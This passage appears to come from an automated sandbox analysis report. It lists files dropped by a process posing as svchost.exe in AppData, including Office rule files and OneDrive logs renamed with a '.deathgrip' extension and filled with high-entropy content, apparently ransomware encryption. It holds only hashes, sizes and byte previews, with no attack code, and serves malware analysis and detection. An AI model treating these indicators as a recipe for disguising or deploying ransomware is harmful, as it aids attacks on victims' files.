                                                          MD5:D1457B72C3FB323A2671125AEF3EAB5D
                                                          SHA1:5BAB61EB53176449E25C2C82F172B82CB13FFB9D
                                                          SHA-256:8A8DE823D5ED3E12746A62EF169BCF372BE0CA44F0A1236ABC35DF05D96928E1
                                                          SHA-512:CA63C07AD35D8C9FB0C92D6146759B122D4EC5D3F67EBE2F30DDB69F9E6C9FD3BF31A5E408B08F1D4D9CD68120CCED9E57F010BEF3CDE97653FED5470DA7D1A0
                                                          Malicious:false
                                                          Preview:?

                                                          C:\Users\jones\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule11264v0.xml.deathgrip

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):3200
                                                          Entropy (8bit):7.912416428080425
                                                          Encrypted:false
                                                          SSDEEP:96:aXXetROxInmtfBnPxxxq3OdXExgM/Dn+sPL:VOxInkfBJxxqedXK/DnZ
                                                          MD5:29F6DA4EB74AF9F8E89FADF2905C37A6
                                                          SHA1:CFB86F5FF7FC355BEE22869ED9F65A71970998C3
                                                          SHA-256:0C7860584A926C676854BB44815FD3B06B101B80FF38708FF8F9E1A8D6C545D9
                                                          SHA-512:F365B929C3E7C23A8E592824E788A81509EAF806FA52C4C942002C1C59627B2C0E468C31BA7C6917B94C6432C1BE169909F8F4F000654C11A25F3CD08C232786
                                                          Malicious:false
                                                          Preview:.........v..1...o...q..,.!+.@....3..h......>%........,..VE........`5....|L.|.lb......[.a...xKc....-.cC.hpN.fWF.X..../Q.lR.dtkL.....W.B(Q....$...]....... /..5...o..........CB......N...}..D..W.r.b.u^u.9.%->..9..x.o{...BC....C%t*.............P........^.6u...@#...Pt..|..4Z.>.FQd...XK0v.....:\.!"D..J....; ..'..3bk.bb ..b^.9.3..dT.v....t..._.l..5...J+-..Z..~.V.?{..Uz ..? R2a|.../....P...N..K..O...b...6.zl.(.:..`l./....u.h.{..&.~a.`z.I.....]...5.#...+......z.=.w....J>..}%(.V...,.Vc...[...,...Z.K..r{u.[Z...\....F.......p+":.F.z."v|`.K....e...f .2]<._..d..n.0....!...qk.|.'<..(..I..9...~..f.?.....q..R3.....l...=W>...<..1...(.K.A9.z...jI...F..f.3.....G.[[I~..R.ON..A.........3.5..9P...'"r....5..G.Z..F..h7.e..q.=.......roj.k...ZC ......q.....(.0...?Fr<.KS..[3...Z..x.6i..^........}?5..)Q^..$O.I......OJ.su...3..{#.@,{k_.\.|....E.C[......{`...Lu...OK....+....{........w/.z.B.]../G....t>.#`T.\._.E..>Z.....F.XL...".9........!..ZhM..L.!.....

                                                          C:\Users\jones\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule11265v1.xml

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:very short file (no magic)
                                                          Category:dropped
                                                          Size (bytes):1
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3:a:a
                                                          MD5:D1457B72C3FB323A2671125AEF3EAB5D
                                                          SHA1:5BAB61EB53176449E25C2C82F172B82CB13FFB9D
                                                          SHA-256:8A8DE823D5ED3E12746A62EF169BCF372BE0CA44F0A1236ABC35DF05D96928E1
                                                          SHA-512:CA63C07AD35D8C9FB0C92D6146759B122D4EC5D3F67EBE2F30DDB69F9E6C9FD3BF31A5E408B08F1D4D9CD68120CCED9E57F010BEF3CDE97653FED5470DA7D1A0
                                                          Malicious:false
                                                          Preview:?

                                                          C:\Users\jones\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule11265v1.xml.deathgrip

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):2128
                                                          Entropy (8bit):7.852876441718176
                                                          Encrypted:false
                                                          SSDEEP:48:k88ryDTL0qz99CN3LT3diycBG0fEVSwTpJGiR1HbEfBhjgE:YWBDCp5iyofo7TrZEfBhkE
                                                          MD5:2FD24A3118C54516A7C7BC1271A29811
                                                          SHA1:15F53118D4C96649E6DF0BA6592E4A23396D314D
                                                          SHA-256:2DCB929B3D2A16D66D0BC125E744EAD0BD0BEC6C6956F5F427E5D86FE5E3814E
                                                          SHA-512:A3A1AC0B39AE1576850B2C5D59BC736ACEBE09BB166C07B5C126ACAB34F9D508AC1CFD00008FC6AC1CF056859CAFE98C02EAF9D16EF93BBDF97CFB7EC778693D
                                                          Malicious:false
                                                          Preview:.........v..1...o...q..,.!+.@....3..h......>%........[+L..y......g.p.Vg..h...._.YG./......'F.F........^..V...b...9....Z(.|S..g...n..hC.#).u..B...u.J.+.e...s.nR.u....x..T2..EW../....P..Iw..a._.kb...5...th...}..S|Y..O.8Q....x.Y..H.U.M....0|....c......')&..}d.....T...X..._.Fc+....eM.cfV.&.aO..zb....'....,.c..I..V.V. .......Xb.}..m).u.....`..."....9..Y..~^8RU.we.).t.V..UL.'..f.;...b..BBr2..y....=.7.G..~.O....;...y...@}.d..xZ..4.x.......?.....!Rk.k.5..g~M.cb.........&g.o.6.o.....b.5.v.7).......8).....Xe...p...g.....k.o.`&C~AI@."....fl8...;@E...S....i.9F..I..Q0qQ...=.!..yd.......Y.r=.f..$..9..+^w|.7l..1vl_P....<KZcpZ..T.#..\.+......l.....,l....\..m....w..8..I~.be....#o.....1.)W..e5.Vv..S.....E.E.E....?....8.("....).C......?..$PJ._=9r,.......L..:.....a..v....no.E.2lU*....0..N.....I.gQ...Y...Ek.u.k0...Y.dm.2 %..z.B.03......9hh4.-.....g.bSXlY.U.n*t.x.v\o...W.Q...0-........#....Q-....{\j....."..._.f..........mn..;@.d..._..u.>!w..>.k....A.;...dh..

                                                          C:\Users\jones\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule11285v1.xml.deathgrip

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):8
                                                          Entropy (8bit):3.0
                                                          Encrypted:false
                                                          SSDEEP:3:/:/
                                                          MD5:0EE0646C1C77D8131CC8F4EE65C7673B
                                                          SHA1:DD5783BCF1E9002BC00AD5B83A95ED6E4EBB4AD5
                                                          SHA-256:66840DDA154E8A113C31DD0AD32F7F3A366A80E8136979D8F5A101D3D29D6F72
                                                          SHA-512:1818CC2ACD207880A07AFC360FD0DA87E51CCF17E7C604C4EB16BE5788322724C298E1FCC66EB293926993141EF0863C09EDA383188CF5DF49B910AACAC17EC5
                                                          Malicious:false
                                                          Preview:........

                                                          C:\Users\jones\AppData\Local\Microsoft\Office\16.0\officesetup.exe_Rules\rule703950v0.xml

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:very short file (no magic)
                                                          Category:dropped
                                                          Size (bytes):1
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3:a:a
                                                          MD5:D1457B72C3FB323A2671125AEF3EAB5D
                                                          SHA1:5BAB61EB53176449E25C2C82F172B82CB13FFB9D
                                                          SHA-256:8A8DE823D5ED3E12746A62EF169BCF372BE0CA44F0A1236ABC35DF05D96928E1
                                                          SHA-512:CA63C07AD35D8C9FB0C92D6146759B122D4EC5D3F67EBE2F30DDB69F9E6C9FD3BF31A5E408B08F1D4D9CD68120CCED9E57F010BEF3CDE97653FED5470DA7D1A0
                                                          Malicious:false
                                                          Preview:?

                                                          C:\Users\jones\AppData\Local\Microsoft\Office\16.0\officesetup.exe_Rules\rule703951v0.xml

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:very short file (no magic)
                                                          Category:dropped
                                                          Size (bytes):1
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3:a:a
                                                          MD5:D1457B72C3FB323A2671125AEF3EAB5D
                                                          SHA1:5BAB61EB53176449E25C2C82F172B82CB13FFB9D
                                                          SHA-256:8A8DE823D5ED3E12746A62EF169BCF372BE0CA44F0A1236ABC35DF05D96928E1
                                                          SHA-512:CA63C07AD35D8C9FB0C92D6146759B122D4EC5D3F67EBE2F30DDB69F9E6C9FD3BF31A5E408B08F1D4D9CD68120CCED9E57F010BEF3CDE97653FED5470DA7D1A0
                                                          Malicious:false
                                                          Preview:?

                                                          C:\Users\jones\AppData\Local\Microsoft\Office\16.0\officesetup.exe_Rules\rule704000v0.xml

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:very short file (no magic)
                                                          Category:dropped
                                                          Size (bytes):1
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3:a:a
                                                          MD5:D1457B72C3FB323A2671125AEF3EAB5D
                                                          SHA1:5BAB61EB53176449E25C2C82F172B82CB13FFB9D
                                                          SHA-256:8A8DE823D5ED3E12746A62EF169BCF372BE0CA44F0A1236ABC35DF05D96928E1
                                                          SHA-512:CA63C07AD35D8C9FB0C92D6146759B122D4EC5D3F67EBE2F30DDB69F9E6C9FD3BF31A5E408B08F1D4D9CD68120CCED9E57F010BEF3CDE97653FED5470DA7D1A0
                                                          Malicious:false
                                                          Preview:?

                                                          C:\Users\jones\AppData\Local\Microsoft\Office\16.0\officesetup.exe_Rules\rule704001v0.xml

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:very short file (no magic)
                                                          Category:dropped
                                                          Size (bytes):1
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3:a:a
                                                          MD5:D1457B72C3FB323A2671125AEF3EAB5D
                                                          SHA1:5BAB61EB53176449E25C2C82F172B82CB13FFB9D
                                                          SHA-256:8A8DE823D5ED3E12746A62EF169BCF372BE0CA44F0A1236ABC35DF05D96928E1
                                                          SHA-512:CA63C07AD35D8C9FB0C92D6146759B122D4EC5D3F67EBE2F30DDB69F9E6C9FD3BF31A5E408B08F1D4D9CD68120CCED9E57F010BEF3CDE97653FED5470DA7D1A0
                                                          Malicious:false
                                                          Preview:?

                                                          C:\Users\jones\AppData\Local\Microsoft\Office\16.0\officesetup.exe_Rules\rule704050v0.xml

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:very short file (no magic)
                                                          Category:dropped
                                                          Size (bytes):1
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3:a:a
                                                          MD5:D1457B72C3FB323A2671125AEF3EAB5D
                                                          SHA1:5BAB61EB53176449E25C2C82F172B82CB13FFB9D
                                                          SHA-256:8A8DE823D5ED3E12746A62EF169BCF372BE0CA44F0A1236ABC35DF05D96928E1
                                                          SHA-512:CA63C07AD35D8C9FB0C92D6146759B122D4EC5D3F67EBE2F30DDB69F9E6C9FD3BF31A5E408B08F1D4D9CD68120CCED9E57F010BEF3CDE97653FED5470DA7D1A0
                                                          Malicious:false
                                                          Preview:?

                                                          C:\Users\jones\AppData\Local\Microsoft\Office\16.0\officesetup.exe_Rules\rule704051v0.xml

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:very short file (no magic)
                                                          Category:dropped
                                                          Size (bytes):1
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3:a:a
                                                          MD5:D1457B72C3FB323A2671125AEF3EAB5D
                                                          SHA1:5BAB61EB53176449E25C2C82F172B82CB13FFB9D
                                                          SHA-256:8A8DE823D5ED3E12746A62EF169BCF372BE0CA44F0A1236ABC35DF05D96928E1
                                                          SHA-512:CA63C07AD35D8C9FB0C92D6146759B122D4EC5D3F67EBE2F30DDB69F9E6C9FD3BF31A5E408B08F1D4D9CD68120CCED9E57F010BEF3CDE97653FED5470DA7D1A0
                                                          Malicious:false
                                                          Preview:?

                                                          C:\Users\jones\AppData\Local\Microsoft\Office\16.0\officesetup.exe_Rules\rule704100v0.xml

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:very short file (no magic)
                                                          Category:dropped
                                                          Size (bytes):1
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3:a:a
                                                          MD5:D1457B72C3FB323A2671125AEF3EAB5D
                                                          SHA1:5BAB61EB53176449E25C2C82F172B82CB13FFB9D
                                                          SHA-256:8A8DE823D5ED3E12746A62EF169BCF372BE0CA44F0A1236ABC35DF05D96928E1
                                                          SHA-512:CA63C07AD35D8C9FB0C92D6146759B122D4EC5D3F67EBE2F30DDB69F9E6C9FD3BF31A5E408B08F1D4D9CD68120CCED9E57F010BEF3CDE97653FED5470DA7D1A0
                                                          Malicious:false
                                                          Preview:?

                                                          C:\Users\jones\AppData\Local\Microsoft\Office\16.0\officesetup.exe_Rules\rule704100v0.xml.deathgrip

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):8
                                                          Entropy (8bit):3.0
                                                          Encrypted:false
                                                          SSDEEP:3:/:/
                                                          MD5:0EE0646C1C77D8131CC8F4EE65C7673B
                                                          SHA1:DD5783BCF1E9002BC00AD5B83A95ED6E4EBB4AD5
                                                          SHA-256:66840DDA154E8A113C31DD0AD32F7F3A366A80E8136979D8F5A101D3D29D6F72
                                                          SHA-512:1818CC2ACD207880A07AFC360FD0DA87E51CCF17E7C604C4EB16BE5788322724C298E1FCC66EB293926993141EF0863C09EDA383188CF5DF49B910AACAC17EC5
                                                          Malicious:false
                                                          Preview:........

                                                          C:\Users\jones\AppData\Local\Microsoft\Office\16.0\officesetup.exe_Rules\rule704101v0.xml

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:very short file (no magic)
                                                          Category:dropped
                                                          Size (bytes):1
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3:a:a
                                                          MD5:D1457B72C3FB323A2671125AEF3EAB5D
                                                          SHA1:5BAB61EB53176449E25C2C82F172B82CB13FFB9D
                                                          SHA-256:8A8DE823D5ED3E12746A62EF169BCF372BE0CA44F0A1236ABC35DF05D96928E1
                                                          SHA-512:CA63C07AD35D8C9FB0C92D6146759B122D4EC5D3F67EBE2F30DDB69F9E6C9FD3BF31A5E408B08F1D4D9CD68120CCED9E57F010BEF3CDE97653FED5470DA7D1A0
                                                          Malicious:false
                                                          Preview:?

                                                          C:\Users\jones\AppData\Local\Microsoft\Office\16.0\officesetup.exe_Rules\rule704101v0.xml.deathgrip

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):8
                                                          Entropy (8bit):3.0
                                                          Encrypted:false
                                                          SSDEEP:3:/:/
                                                          MD5:0EE0646C1C77D8131CC8F4EE65C7673B
                                                          SHA1:DD5783BCF1E9002BC00AD5B83A95ED6E4EBB4AD5
                                                          SHA-256:66840DDA154E8A113C31DD0AD32F7F3A366A80E8136979D8F5A101D3D29D6F72
                                                          SHA-512:1818CC2ACD207880A07AFC360FD0DA87E51CCF17E7C604C4EB16BE5788322724C298E1FCC66EB293926993141EF0863C09EDA383188CF5DF49B910AACAC17EC5
                                                          Malicious:false
                                                          Preview:........

                                                          C:\Users\jones\AppData\Local\Microsoft\Office\16.0\officesetup.exe_Rules\rule704150v0.xml

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:very short file (no magic)
                                                          Category:dropped
                                                          Size (bytes):1
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3:a:a
                                                          MD5:D1457B72C3FB323A2671125AEF3EAB5D
                                                          SHA1:5BAB61EB53176449E25C2C82F172B82CB13FFB9D
                                                          SHA-256:8A8DE823D5ED3E12746A62EF169BCF372BE0CA44F0A1236ABC35DF05D96928E1
                                                          SHA-512:CA63C07AD35D8C9FB0C92D6146759B122D4EC5D3F67EBE2F30DDB69F9E6C9FD3BF31A5E408B08F1D4D9CD68120CCED9E57F010BEF3CDE97653FED5470DA7D1A0
                                                          Malicious:false
                                                          Preview:?

                                                          C:\Users\jones\AppData\Local\Microsoft\Office\16.0\officesetup.exe_Rules\rule704150v0.xml.deathgrip

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):8
                                                          Entropy (8bit):3.0
                                                          Encrypted:false
                                                          SSDEEP:3:/:/
                                                          MD5:0EE0646C1C77D8131CC8F4EE65C7673B
                                                          SHA1:DD5783BCF1E9002BC00AD5B83A95ED6E4EBB4AD5
                                                          SHA-256:66840DDA154E8A113C31DD0AD32F7F3A366A80E8136979D8F5A101D3D29D6F72
                                                          SHA-512:1818CC2ACD207880A07AFC360FD0DA87E51CCF17E7C604C4EB16BE5788322724C298E1FCC66EB293926993141EF0863C09EDA383188CF5DF49B910AACAC17EC5
                                                          Malicious:false
                                                          Preview:........

                                                          C:\Users\jones\AppData\Local\Microsoft\Office\16.0\officesetup.exe_Rules\rule704151v0.xml

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:very short file (no magic)
                                                          Category:dropped
                                                          Size (bytes):1
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3:a:a
                                                          MD5:D1457B72C3FB323A2671125AEF3EAB5D
                                                          SHA1:5BAB61EB53176449E25C2C82F172B82CB13FFB9D
                                                          SHA-256:8A8DE823D5ED3E12746A62EF169BCF372BE0CA44F0A1236ABC35DF05D96928E1
                                                          SHA-512:CA63C07AD35D8C9FB0C92D6146759B122D4EC5D3F67EBE2F30DDB69F9E6C9FD3BF31A5E408B08F1D4D9CD68120CCED9E57F010BEF3CDE97653FED5470DA7D1A0
                                                          Malicious:false
                                                          Preview:?

                                                          C:\Users\jones\AppData\Local\Microsoft\Office\16.0\officesetup.exe_Rules\rule704151v0.xml.deathgrip

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1760
                                                          Entropy (8bit):7.824738308445327
                                                          Encrypted:false
                                                          SSDEEP:48:1KLQARVhKyHoOEuzKfNz6EKSqrIcvajtE4EH1:gL5rxaz6EYrI0ajFM1
                                                          MD5:D868C11506EC3AF0D082F3EEE453D351
                                                          SHA1:9D8A7C38175981A7936D821FC537BEA4D351E651
                                                          SHA-256:509F183109D7E268443B6993776D2DB1E7DF210785C7E99014E03FB10D9AEA3E
                                                          SHA-512:66663F661E705F875634FD80CBB166C6153B4C4E5705E0FBBB21BFE45FEB054C68D81EB1AE03965AEE69C1D1738BD5B6DEC74506A0551ECD779D29A4190E3FA7
                                                          Malicious:false
                                                          Preview:........m.-P`..3Cq0C.....A..K.....N..0.....L.&xRti.F..5..."+...u...Q.<.]...J.K..?o....I_b`..5Q...dL..R....X...........-._....S....x..{........T.Q....n+.~.....&V.uC.+vh;T]_....;!.. ..0..t.I..r...yHuT..Y...A.n....p.iA.M..X..Hf..v.O.z..5T.%l?.+).......Q^j...q.z.{O.......m.....0..>..!$.....?..@..B.2..aS.....P|.q.7...*3.7..l.a[..........-..S...$.1.@w~.-.F....p.9.d...Q.s.............H.......g..a..lt...../....V.T4...V.......Lfy.`.hq..8.....kW..u....D.v*.as..9...Z...m...!A+u.....7..r...H/B......vmS..]..[n.Zk.. .yx/%.wpA..a...*.4...6= ....?^t2.w..{,..v..zPn.N....q...R..a..b...EwQ5h2.T.".A.../16.0..X.[...B...=.-$...h...e..?a&%..M...6.$.<.....'.|0...ss.y...r...(/.]b|q.N..S.w.>$..f..|.X..S.s..B.0_.X....L.1.P.`.4i.`k.y....0.>.a3.j$..Y....:...fz.Ez6..KEt.......n.]5j...X...'.=.^Bm...W. ..#.t..VIDz..#EVT.g}..m.l.].*Ih......A...Z.......QQ...G..]7....a....$...2...%c................I...J.Bi'...=#...f.*&.s....O..0...W*[..\.S.^.7a.)..j4..9...%[_...c...

                                                          C:\Users\jones\AppData\Local\Microsoft\Office\16.0\officesetup.exe_Rules\rule704200v0.xml

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:very short file (no magic)
                                                          Category:dropped
                                                          Size (bytes):1
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3:a:a
                                                          MD5:D1457B72C3FB323A2671125AEF3EAB5D
                                                          SHA1:5BAB61EB53176449E25C2C82F172B82CB13FFB9D
                                                          SHA-256:8A8DE823D5ED3E12746A62EF169BCF372BE0CA44F0A1236ABC35DF05D96928E1
                                                          SHA-512:CA63C07AD35D8C9FB0C92D6146759B122D4EC5D3F67EBE2F30DDB69F9E6C9FD3BF31A5E408B08F1D4D9CD68120CCED9E57F010BEF3CDE97653FED5470DA7D1A0
                                                          Malicious:false
                                                          Preview:?

                                                          C:\Users\jones\AppData\Local\Microsoft\Office\16.0\officesetup.exe_Rules\rule704200v0.xml.deathgrip

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):8
                                                          Entropy (8bit):3.0
                                                          Encrypted:false
                                                          SSDEEP:3:/:/
                                                          MD5:0EE0646C1C77D8131CC8F4EE65C7673B
                                                          SHA1:DD5783BCF1E9002BC00AD5B83A95ED6E4EBB4AD5
                                                          SHA-256:66840DDA154E8A113C31DD0AD32F7F3A366A80E8136979D8F5A101D3D29D6F72
                                                          SHA-512:1818CC2ACD207880A07AFC360FD0DA87E51CCF17E7C604C4EB16BE5788322724C298E1FCC66EB293926993141EF0863C09EDA383188CF5DF49B910AACAC17EC5
                                                          Malicious:false
                                                          Preview:........

                                                          C:\Users\jones\AppData\Local\Microsoft\Office\16.0\officesetup.exe_Rules\rule704201v0.xml

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:very short file (no magic)
                                                          Category:dropped
                                                          Size (bytes):1
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3:a:a
                                                          MD5:D1457B72C3FB323A2671125AEF3EAB5D
                                                          SHA1:5BAB61EB53176449E25C2C82F172B82CB13FFB9D
                                                          SHA-256:8A8DE823D5ED3E12746A62EF169BCF372BE0CA44F0A1236ABC35DF05D96928E1
                                                          SHA-512:CA63C07AD35D8C9FB0C92D6146759B122D4EC5D3F67EBE2F30DDB69F9E6C9FD3BF31A5E408B08F1D4D9CD68120CCED9E57F010BEF3CDE97653FED5470DA7D1A0
                                                          Malicious:false
                                                          Preview:?

                                                          C:\Users\jones\AppData\Local\Microsoft\Office\16.0\officesetup.exe_Rules\rule704201v0.xml.deathgrip

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):8
                                                          Entropy (8bit):3.0
                                                          Encrypted:false
                                                          SSDEEP:3:/:/
                                                          MD5:0EE0646C1C77D8131CC8F4EE65C7673B
                                                          SHA1:DD5783BCF1E9002BC00AD5B83A95ED6E4EBB4AD5
                                                          SHA-256:66840DDA154E8A113C31DD0AD32F7F3A366A80E8136979D8F5A101D3D29D6F72
                                                          SHA-512:1818CC2ACD207880A07AFC360FD0DA87E51CCF17E7C604C4EB16BE5788322724C298E1FCC66EB293926993141EF0863C09EDA383188CF5DF49B910AACAC17EC5
                                                          Malicious:false
                                                          Preview:........

                                                          C:\Users\jones\AppData\Local\Microsoft\Office\16.0\officesetup.exe_Rules\rule90401v3.xml

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:very short file (no magic)
                                                          Category:dropped
                                                          Size (bytes):1
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3:a:a
                                                          MD5:D1457B72C3FB323A2671125AEF3EAB5D
                                                          SHA1:5BAB61EB53176449E25C2C82F172B82CB13FFB9D
                                                          SHA-256:8A8DE823D5ED3E12746A62EF169BCF372BE0CA44F0A1236ABC35DF05D96928E1
                                                          SHA-512:CA63C07AD35D8C9FB0C92D6146759B122D4EC5D3F67EBE2F30DDB69F9E6C9FD3BF31A5E408B08F1D4D9CD68120CCED9E57F010BEF3CDE97653FED5470DA7D1A0
                                                          Malicious:false
                                                          Preview:?

                                                          C:\Users\jones\AppData\Local\Microsoft\Office\16.0\officesetup.exe_Rules\rule90401v3.xml.deathgrip

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):8
                                                          Entropy (8bit):3.0
                                                          Encrypted:false
                                                          SSDEEP:3:/:/
                                                          MD5:0EE0646C1C77D8131CC8F4EE65C7673B
                                                          SHA1:DD5783BCF1E9002BC00AD5B83A95ED6E4EBB4AD5
                                                          SHA-256:66840DDA154E8A113C31DD0AD32F7F3A366A80E8136979D8F5A101D3D29D6F72
                                                          SHA-512:1818CC2ACD207880A07AFC360FD0DA87E51CCF17E7C604C4EB16BE5788322724C298E1FCC66EB293926993141EF0863C09EDA383188CF5DF49B910AACAC17EC5
                                                          Malicious:false
                                                          Preview:........

                                                          C:\Users\jones\AppData\Local\Microsoft\OneDrive\setup\logs\DeviceHealthSummaryConfiguration.ini

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:very short file (no magic)
                                                          Category:dropped
                                                          Size (bytes):1
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3:a:a
                                                          MD5:D1457B72C3FB323A2671125AEF3EAB5D
                                                          SHA1:5BAB61EB53176449E25C2C82F172B82CB13FFB9D
                                                          SHA-256:8A8DE823D5ED3E12746A62EF169BCF372BE0CA44F0A1236ABC35DF05D96928E1
                                                          SHA-512:CA63C07AD35D8C9FB0C92D6146759B122D4EC5D3F67EBE2F30DDB69F9E6C9FD3BF31A5E408B08F1D4D9CD68120CCED9E57F010BEF3CDE97653FED5470DA7D1A0
                                                          Malicious:false
                                                          Preview:?

                                                          C:\Users\jones\AppData\Local\Microsoft\OneDrive\setup\logs\DeviceHealthSummaryConfiguration.ini.deathgrip

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):8
                                                          Entropy (8bit):3.0
                                                          Encrypted:false
                                                          SSDEEP:3:/:/
                                                          MD5:0EE0646C1C77D8131CC8F4EE65C7673B
                                                          SHA1:DD5783BCF1E9002BC00AD5B83A95ED6E4EBB4AD5
                                                          SHA-256:66840DDA154E8A113C31DD0AD32F7F3A366A80E8136979D8F5A101D3D29D6F72
                                                          SHA-512:1818CC2ACD207880A07AFC360FD0DA87E51CCF17E7C604C4EB16BE5788322724C298E1FCC66EB293926993141EF0863C09EDA383188CF5DF49B910AACAC17EC5
                                                          Malicious:false
                                                          Preview:........

                                                          C:\Users\jones\AppData\Local\Microsoft\OneDrive\setup\logs\Install-PerUser_2023-10-03_114938_158-b2c.log

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):65536
                                                          Entropy (8bit):2.6615423635777775E-4
                                                          Encrypted:false
                                                          SSDEEP:3::
                                                          MD5:F05CA86CFF1B7B6B2DD396A13BEB76C2
                                                          SHA1:166D7294B475634902404445AF7C363FBA847074
                                                          SHA-256:AB04BF42874FA27C273409A28DA41DE7BC6563AE22EE5DA07170C8989F16DE1F
                                                          SHA-512:9F91E56A558E073AC712CAC483DD3D8401D33B324D194DBD977D05981634D90B4A33992EA954ADD68EEB27A8A07BF044701E83D3B05D4800C86B0843395E437B
                                                          Malicious:false
                                                          Preview:?.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                          C:\Users\jones\AppData\Local\Microsoft\OneDrive\setup\logs\Install-PerUser_2023-10-03_114938_158-b2c.log.deathgrip

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):65536
                                                          Entropy (8bit):0.0021292244851304357
                                                          Encrypted:false
                                                          SSDEEP:3:v:v
                                                          MD5:A7AEE61DDCEA3E22CE0C9366C32544DD
                                                          SHA1:E1572BA5359FDEB9994379FFC1DE30F7FD9ED34A
                                                          SHA-256:EF0E2C4E17A614B9546566D1C7EEA08A6AAADEFCC8EA85EB720CC95375D65333
                                                          SHA-512:A6B37CEB767E45A65E8DE6A474F14187252A829B816214103F5B361976B86D1549B3F288E87E22221A63FC606B94D234A5BFF3C9924AAB9BC7C5E73FF5DB73EF
                                                          Malicious:false
                                                          Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                          C:\Users\jones\AppData\Local\Microsoft\OneDrive\setup\logs\Install-PerUser_2023-10-03_115005_9064-2616.log

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):65536
                                                          Entropy (8bit):2.6615423635777775E-4
                                                          Encrypted:false
                                                          SSDEEP:3::
                                                          MD5:F05CA86CFF1B7B6B2DD396A13BEB76C2
                                                          SHA1:166D7294B475634902404445AF7C363FBA847074
                                                          SHA-256:AB04BF42874FA27C273409A28DA41DE7BC6563AE22EE5DA07170C8989F16DE1F
                                                          SHA-512:9F91E56A558E073AC712CAC483DD3D8401D33B324D194DBD977D05981634D90B4A33992EA954ADD68EEB27A8A07BF044701E83D3B05D4800C86B0843395E437B
                                                          Malicious:false
